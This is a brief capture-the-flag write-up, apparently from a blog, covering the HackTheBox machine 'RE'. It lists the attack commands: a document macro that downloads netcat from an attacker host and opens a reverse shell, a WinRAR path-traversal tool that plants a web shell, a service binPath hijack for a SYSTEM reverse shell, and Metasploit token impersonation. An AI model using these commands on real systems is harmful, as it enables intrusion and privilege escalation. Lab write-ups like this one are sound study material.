RE @ HackTheBox
RE is a 40 point windows machine on HackTheBox that involves uploading an ods file with a malicious macro, abusing a winrar vulnerability and using UsoSVC together with metasploit’s incognito module to become root.
Notes
ODS Macro:
1
2
3
4
Sub Run_at_open
Shell("certutil.exe -urlcache -split -f 'http://<lhost>:8000/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe")
Shell("C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 7000 -ecmd.exe")
End Sub
1
python3 evilWinRAR.py -e xct_shell.aspx -p 'c:\inetpub\wwwroot\re\' -o xct.rar
UsoSVC:
1
2
3
sc config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 9000 -e cmd.exe"
sc stop usosvc
sc start usosvc
Incognito:
1
2
3
use incognito
list_tokens -u
impersonate_token RE\\coby
This post is licensed under CC BY 4.0 by the author.